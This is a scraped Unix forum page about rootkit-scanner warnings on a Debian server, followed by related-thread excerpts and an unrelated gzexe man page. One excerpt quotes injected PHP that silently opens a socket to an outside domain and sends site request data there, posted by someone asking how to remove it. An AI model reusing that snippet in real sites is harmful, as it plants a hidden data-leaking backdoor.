Sponsored Content
Full Discussion: Malicious perl script
Operating Systems Linux Debian Malicious perl script Post 302992371 by dadprpus on Friday 24th of February 2017 08:38:30 AM
Old 02-24-2017
I do have Plesk and it is very user friendly. I have installed "watchdog" and it runs a script periodically and sends me an email. No viruses found but it did come up with this:
Code:
[14:28:03] Info: SCAN_MODE_DEV set to 'THOROUGH'
[14:28:04]   Checking /dev for suspicious file types         [ Warning ]
[14:28:04] Warning: Suspicious file types found in /dev:
[14:28:04]          /dev/shm/R1Soft-SHM-ZocPNFWuCcEl2rrN: data
[14:28:04]   Checking for hidden files and directories       [ Warning ]
[14:28:04] Warning: Hidden directory found: /dev/.udev
[14:28:04] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
[14:28:04] Warning: Hidden file found: /usr/share/man/man5/.k5login.5.gz: gzip compressed data, from Unix, max compression
[14:28:04] Warning: Hidden file found: /usr/share/man/man5/.k5identity.5.gz: gzip compressed data, from Unix, max compression
[14:28:04] Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
[14:28:04] Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
[14:28:04] Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text

Moderator's Comments:
Mod Comment Please use CODE tags as required by forum rules!

Last edited by RudiC; 02-24-2017 at 10:14 AM.. Reason: Added CODE tags.

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl... (1 Reply)
Discussion started by: grajp002
1 Replies

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies
GZEXE(1)						      General Commands Manual							  GZEXE(1)

NAME
gzexe - compress executable files in place SYNOPSIS
gzexe name ... DESCRIPTION
The gzexe utility allows you to compress executables in place and have them automatically uncompress and execute when you run them (at a penalty in performance). For example if you execute ``gzexe /usr/bin/gdb'' it will create the following two files: -rwxr-xr-x 1 root root 1026675 Jun 7 13:53 /usr/bin/gdb -rwxr-xr-x 1 root root 2304524 May 30 13:02 /usr/bin/gdb~ /usr/bin/gdb~ is the original file and /usr/bin/gdb is the self-uncompressing executable file. You can remove /usr/bin/gdb~ once you are sure that /usr/bin/gdb works properly. This utility is most useful on systems with very small disks. OPTIONS
-d Decompress the given executables instead of compressing them. SEE ALSO
gzip(1), znew(1), zmore(1), zcmp(1), zforce(1) CAVEATS
The compressed executable is a shell script. This may create some security holes. In particular, the compressed executable relies on the PATH environment variable to find gzip and some standard utilities (basename, chmod, ln, mkdir, mktemp, rm, sleep, and tail). BUGS
gzexe attempts to retain the original file attributes on the compressed executable, but you may have to fix them manually in some cases, using chmod or chown. GZEXE(1)